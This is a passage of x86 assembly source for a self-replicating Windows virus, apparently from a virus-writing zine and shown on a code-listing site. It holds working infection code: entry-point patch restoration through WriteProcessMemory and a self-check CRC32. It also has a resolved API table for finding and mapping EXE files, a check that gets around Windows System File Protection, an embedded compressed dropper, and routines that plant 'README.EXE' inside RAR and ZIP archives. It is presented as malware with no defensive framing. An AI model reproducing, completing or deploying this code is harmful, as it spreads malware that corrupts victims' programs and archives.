📄 29a-7.006
字号:
mov esi,[hostEP+ebp]
mov [esp+24h],esi ; put ret addr
call dword [_GetCurrentProcess+ebp] ; patch our process
lea edx,[padding+ebp]
push edx
push dword 5
sub edx,-4
push edx
push dword [hostEP+ebp]
push eax
call dword [_WriteProcessMemory+ebp]
or eax,eax
jz $ ; well... hehehe
; in fact it failed :P
; code modified by epo is restored
; just fly away
popfd
popad
ret
; get variables displacement
getDelta:
call _getDelta
_getDelta:
pop ebp
sub ebp,_getDelta
ret
; does crc32 for self integrity check
CRC32:
cld
xor ecx,ecx
dec ecx
mov edx,ecx
push ebx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC:
dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jnz NextByteCRC
pop ebx
not edx
not ecx
mov eax,edx
rol eax,16
mov ax,cx
ret
%include "infectpe.inc"
%include "findf.inc"
%include "hooks.inc"
%include "archive.inc"
; our import table
API0 db API1-API0
_GetFileAttributesA dd 0
GetFileAttributesAstr db "GetFileAttributesA",0
API1 db API2-API1
_SetFileAttributesA dd 0
SetFileAttributesAstr db "SetFileAttributesA",0
API2 db API3-API2
_CreateFileA dd 0
CreateFileAstr db "CreateFileA",0
API3 db API4-API3
_GetFileSize dd 0
GetFileSizestr db "GetFileSize",0
API4 db API5-API4
_GetFileTime dd 0
GetFileTimestr db "GetFileTime",0
API5 db API6-API5
_CreateFileMappingA dd 0
CreateFileMappingAstr db "CreateFileMappingA",0
API6 db API7-API6
_MapViewOfFile dd 0
MapViewOfFilestr db "MapViewOfFile",0
API7 db API8-API7
_UnmapViewOfFile dd 0
UnmapViewOfFilestr db "UnmapViewOfFile",0
API8 db API9-API8
_CloseHandle dd 0
CloseHandlestr db "CloseHandle",0
API9 db APIa-API9
_SetFileTime dd 0
SetFileTimestr db "SetFileTime",0
APIa db APIb-APIa
_GetCurrentProcess dd 0
GetCurrentProcessstr db "GetCurrentProcess",0
APIb db APIc-APIb
_WriteProcessMemory dd 0
WriteProcessMemorystr db "WriteProcessMemory",0
APIc db APId-APIc
_LoadLibraryA dd 0
LoadLibraryAstr db "LoadLibraryA",0
APId db APIe-APId
_FreeLibrary dd 0
FreeLibrarystr db "FreeLibrary",0
APIe db APIf-APIe
_FindFirstFileA dd 0
FindFirstFileAstr db "FindFirstFileA",0
APIf db API10-APIf
_FindNextFileA dd 0
FindNextFileAstr db "FindNextFileA",0
API10 db API11-API10
_FindClose dd 0
FindClosestr db "FindClose",0
API11 db API12-API11
_SetCurrentDirectoryA dd 0
SetCurrentDirectoryAstr db "SetCurrentDirectoryA",0
API12 db API13-API12
_GetCurrentDirectoryA dd 0
GetCurrentDirectoryAstr db "GetCurrentDirectoryA",0
API13 db API14-API13
_GetWindowsDirectoryA dd 0
GetWindowsDirectoryAstr db "GetWindowsDirectoryA",0
API14 db API15-API14
_GetLastError dd 0
GetLastErrorstr db "GetLastError",0
API15 db API16-API15
_GetVolumeInformationA dd 0
GetVolumeInformationAs db "GetVolumeInformationA",0
API16 db API17-API16
_MultiByteToWideChar dd 0
MultiByteToWideChars db "MultiByteToWideChar",0
API17 db API18-API17
_GetFullPathNameW dd 0
GetFullPathNameWs db "GetFullPathNameW",0
API18 db 0
_WriteFile dd 0
WriteFiles db "WriteFile",0
GetProcAddress db "GetProcAddress",0
GetProcAddresslen equ $-GetProcAddress
_GetProcAddress dd 0
_sfcdll dd 0
sfcdll db "SFC",0
_SfcIsFileProtected dd 0
SfcIsFileProtected db "SfcIsFileProtected",0
_imagehlpdll dd 0
imagehlpdll db "IMAGEHLP",0
_CheckSumMappedFile dd 0
CheckSumMappedFile db "CheckSumMappedFile",0
fmask: db "*.EXE",0
dropName:
drive db 'c:\' ; for getvolume
serialNum db 0,0,0,0,0
baseAddr dd 0
; Generated RLE compressed data
drop db 005h,04dh,05ah,06ch,000h,001h,083h,000h,004h,004h
db 000h,011h,000h,082h,0ffh,001h,003h,082h,000h,001h
db 001h,086h,000h,001h,040h,0a3h,000h,001h,070h,083h
db 000h,02ch,00eh,01fh,0bah,00eh,000h,0b4h,009h,0cdh
db 021h,0b8h,000h,04ch,0cdh,021h,054h,068h,069h,073h
db 020h,070h,072h,06fh,067h,072h,061h,06dh,020h,072h
db 065h,071h,075h,069h,072h,065h,073h,020h,057h,069h
db 06eh,033h,032h,00dh,00ah,024h,084h,000h,002h,050h
db 045h,082h,000h,008h,04ch,001h,004h,000h,07ah,0e2h
db 064h,03dh,088h,000h,006h,0e0h,000h,002h,001h,00bh
db 001h,08fh,000h,001h,010h,08ch,000h,001h,040h,082h
db 000h,001h,010h,083h,000h,001h,002h,082h,000h,001h
db 001h,087h,000h,001h,004h,088h,000h,001h,050h,083h
db 000h,001h,004h,086h,000h,001h,002h,085h,000h,001h
db 010h,082h,000h,001h,010h,084h,000h,001h,010h,082h
db 000h,001h,010h,086h,000h,001h,010h,08ch,000h,001h
db 030h,082h,000h,001h,056h,09ch,000h,001h,040h,082h
db 000h,001h,00ah,0d3h,000h,005h,02eh,074h,065h,078h
db 074h,084h,000h,001h,010h,083h,000h,001h,010h,082h
db 000h,001h,006h,084h,000h,001h,004h,08eh,000h,001h
db 020h,082h,000h,008h,060h,049h,04dh,050h,04fh,052h
db 054h,053h,082h,000h,001h,010h,083h,000h,001h,020h
db 082h,000h,001h,006h,084h,000h,001h,006h,08eh,000h
db 001h,060h,082h,000h,008h,060h,069h,06dh,070h,06fh
db 072h,074h,073h,082h,000h,001h,010h,083h,000h,001h
db 030h,082h,000h,001h,056h,084h,000h,001h,008h,08eh
db 000h,001h,040h,082h,000h,007h,050h,072h,065h,06ch
db 06fh,063h,073h,083h,000h,001h,010h,083h,000h,001h
db 040h,082h,000h,001h,00ah,084h,000h,001h,00ah,08eh
db 000h,001h,040h,082h,000h,001h,052h,0ffh,000h,0ffh
db 000h,0ffh,000h,0fbh,000h,004h,050h,0e8h,0fah,00fh
db 0ffh,000h,0ffh,000h,0ffh,000h,0ffh,000h,005h,0ffh
db 025h,040h,030h,040h,0ffh,000h,0ffh,000h,0ffh,000h
db 0feh,000h,002h,038h,030h,08ah,000h,002h,028h,030h
db 082h,000h,002h,040h,030h,096h,000h,00ah,06bh,065h
db 072h,06eh,065h,06ch,033h,032h,02eh,064h,082h,06ch
db 084h,000h,002h,048h,030h,086h,000h,002h,048h,030h
db 088h,000h,009h,045h,078h,069h,074h,050h,072h,06fh
db 063h,065h,082h,073h,0ffh,000h,0ffh,000h,0ffh,000h
db 0afh,000h,001h,020h,082h,000h,001h,00ah,083h,000h
db 002h,002h,030h
; That headers thanks to Int13h (or star0?)
RARHeader: ; Header that we will add
RARHeaderCRC dw 0 ; We'll fill: CRC of header
RARType db 074h ; File Header
RARFlags dw 8000h
RARHeadsize dw FinRARHeader-RARHeader
RARCompressed dd 0 ; Compressed and Original
RAROriginal dd 0 ; size are the same, we stored
RAROs db 0 ; OS: 0 ms-dos?
RARCrc32 dd 0 ; We must fill this field
RARFileTime db 0,0 ; Time of the program
RARFileDate db 0,0 ; Date of the proggy
RARNeedVer db 014h
RARMethod db 030h ; Method: storing
RARFnameSize dw FinRARHeader-RARName
RARAttrib dd 20h ; archive
RARName db "README.EXE" ; Name of file to drop
FinRARHeader:
; That header thanks to star0
LocalHeader:
ZIPlogsig: db 50h,4bh,03,04 ; signature
ZIPver: dw 0ah ; ver need to extract
ZIPgenflag: dw 0 ; no particulary flag
ZIPMthd: dw 0 ; no compression
ZIPTime: dw 0 ; aleatory
ZIPDate: dw 0 ; aleatory
ZIPCrc: dd 0 ; unknown
ZIPSize: dd 0 ; unknown
ZIPUncmp: dd 0 ; unknown
ZIPFnln: dw 10 ; unknown
ZIPXtraLn: dw 0 ; unknown
ZIPfileName: db "README.EXE"
CentralHeader:
ZIPCenSig: db 50h,4bh,01,02 ; central signature
ZIPCver: db 0 ; ver made by
ZIPCos: db 0 ; Host Operating -> All
ZIPCvxt: db 0 ; Ver need to extract
ZIPCeXos: db 0 ; Ver need to extract.
ZIPCflg: dw 0 ; No encryption !
ZIPCmthd: dw 0 ; Method : Store it !
ZIPCtim: dw 0 ; last mod time
ZIPCDat: dw 0 ; last mod date
ZIPCCrc: dd 0 ; Crc-32 unknown
ZIPCsiz: dd 0 ; Compressed size unknown
ZIPCunc: dd 0 ; Uncompressed size unkown
ZIPCfnl: dw 10 ; filename length unknown
ZIPCxtl: dw 0 ; Extra Field length 0
ZIPCcml: dw 0 ; file comment length 0
ZIPDsk: dw 0 ; Disk number start (?) 0
ZIPInt: dw 1 ; Internal file attribute
ZIPExt: dd 20h ; external file attrib
ZIPOfst: dd 0 ; relativeoffset local head
ZIPCfileName: db "README.EXE"
EndOfCentral:
; used at infection stage
infectTMP:
epobuffTMP dd 0
db 0
hostEPTMP dd fakeHost
relocTMP dd vBegin
infectTMPlen equ $-infectTMP
myCRC32 dd 0
vEnd equ $
vSize equ (vEnd-vBegin)
; bss data not included into infected files (that's virtual memory)
path0 times 260 db 0
path1 times 260 db 0
dropExp times 2570 db 0 ; place to uncompress the
; dropper
address dd 0
names dd 0
ordinals dd 0
mutexHnd dd 0
finddata:
dwFileAttributes dd 0
dwLowDateTime0 dd 0
dwHigDateTime0 dd 0
dwLowDateTime1 dd 0
dwHigDateTime1 dd 0
dwLowDateTime2 dd 0
dwHigDateTime2 dd 0
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved dd 0,0
cFileName times 260 db 0
cAlternateFilename times 16 db 0
; for sfc shit
wideBuffer times 260*2 db 0 ; 260 wide chars
wideBuffer2 times 260*2 db 0
dummy dd 0
findHnd dd 0
chksum dd 0,0
fHnd dd 0
mapMem dd 0
fhmap dd 0
fileTime0 dd 0,0
fileTime1 dd 0,0
fileTime2 dd 0,0
fileAttrib dd 0
fileSize dd 0
padding dd 0 ; those must be joint
startUp:
epobuff dd 0
db 0
hostEP dd 0
reloc dd 0
viEnd equ $
viSize equ (viEnd-vBegin)
fakeHost:
push dword 0
call ExitProcess
; - main.asm EOF -
; - archive.inc BOF -
fgenmask db "*.*",0
;
; Look for archives to add our virus
;
findArchives:
call dropTheVirus ; drop the virus
lea eax,[finddata+ebp]
push eax
lea eax,[fgenmask+ebp]
push eax
call dword [_FindFirstFileA+ebp]
inc eax
jz near notFoundArchive
dec eax
mov dword [findHnd+ebp],eax
findNextArchive:
mov eax,dword [nFileSizeLow+ebp] ; avoid small
cmp eax,2000h ; 8 kbs
jb near skipThisArchive
cmp eax,400000h*2 ; avoid huge (top 4 mbs)
ja near skipThisArchive
lea esi,[cFileName+ebp]
push esi
UCaseLoopArc:
cmp byte [esi],'a'
jb notUCaseArc
cmp byte [esi],'z'
ja notUCaseArc
sub byte [esi],'a'-'A'
notUCaseArc:
lodsb
or al,al
jnz UCaseLoopArc
mov eax,[esi-5]
pop esi
not eax
cmp eax,~".RAR"
jne nextArc0
call infectRAR
jmp skipThisArchive
nextArc0:
cmp eax,~".ZIP"
jne nextArc1
call infectZIP
jmp skipThisArchive
nextArc1:
skipThisArchive:
lea eax,[finddata+ebp]
push eax
push dword [findHnd+ebp]
call dword [_FindNextFileA+ebp]
or eax,eax
jnz near findNextArchive
push dword [findHnd+ebp]
call dword [_FindClose+ebp]
notFoundArchive:
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -